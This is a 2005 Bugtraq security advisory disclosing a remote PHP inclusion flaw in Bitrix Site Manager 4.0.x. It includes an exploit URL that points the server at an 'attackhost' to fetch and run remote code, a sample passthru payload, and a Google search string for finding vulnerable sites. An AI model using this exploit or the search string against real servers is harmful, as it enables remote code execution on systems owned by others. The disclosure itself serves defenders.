[39179] in bugtraq
Vulnerability: Bitrix Php inclusion
daemon@ATHENA.MIT.EDU (D_BuG)
Wed Jun 15 13:22:21 2005
Date: Wed, 15 Jun 2005 17:58:11 +0400
From: D_BuG <d_bug@bk.ru>
Reply-To: D_BuG <d_bug@bk.ru>
Message-ID: <332659547.20050615175811@bk.ru>
To: bugtraq <bugtraq@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit
Vendor: Bitrix
Product: Bitrix Site Manager 4.0.x
Vulnerability: php including.
Consequence: custom php code execution on server
Risk: Critical
Description:
Due to unfiltered _SERVER[DOCUMENT_ROOT] variable in file “\bitrix\modules\main\start.php”,
hacker can upload php script from other server and execute custom php code on webserver
Send transaction to the server.
Script Example:
<?php
passthru('ls -la');
?>
Transaction should look like http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/
“attackhost” server should contain dbconn.php script in /bitrix/php_interface/ ,
that should be executet on the target server.
Google search: inurl: /bitrix/
Discoveried By D_BuG d_bug@bk.ru
NemesisSecurityTeam
http://nemesisoftware.com/
CheckZond free v. 1.0 http://nemesisoftware.com/products.htm
uses the vulnerabilities above for automatic vulnerabilities search (Google Hacking technique) and usage.
--
Best regards,
D_BuG mailto:d_bug@bk.ru
